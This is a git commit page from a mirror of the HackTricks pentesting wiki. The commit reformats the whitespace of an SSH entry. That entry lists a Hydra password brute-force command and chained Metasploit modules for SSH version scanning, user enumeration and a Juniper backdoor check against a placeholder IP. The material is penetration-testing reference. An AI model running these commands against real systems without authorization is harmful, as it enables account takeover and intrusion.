mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
SSH Format Update
This commit is contained in:
parent
88f868f9f8
commit
d42725a74b
1 changed files with 7 additions and 7 deletions
|
@ -329,15 +329,15 @@ Port_Number: 22
|
|||
Protocol_Description: Secure Shell Hardening
|
||||
|
||||
Entry_1:
|
||||
Name: Hydra Brute Force
|
||||
Description: Need Username
|
||||
Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 -u {IP} ssh
|
||||
Name: Hydra Brute Force
|
||||
Description: Need Username
|
||||
Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 -u {IP} ssh
|
||||
|
||||
Entry_2:
|
||||
Name: consolesless mfs enumeration
|
||||
Description: SSH enumeration without the need to run msfconsole
|
||||
Note: sourced from https://github.com/carlospolop/legion
|
||||
Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit'
|
||||
Name: consolesless mfs enumeration
|
||||
Description: SSH enumeration without the need to run msfconsole
|
||||
Note: sourced from https://github.com/carlospolop/legion
|
||||
Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit'
|
||||
|
||||
```
|
||||
|
||||
|
|
Loading…
Reference in a new issue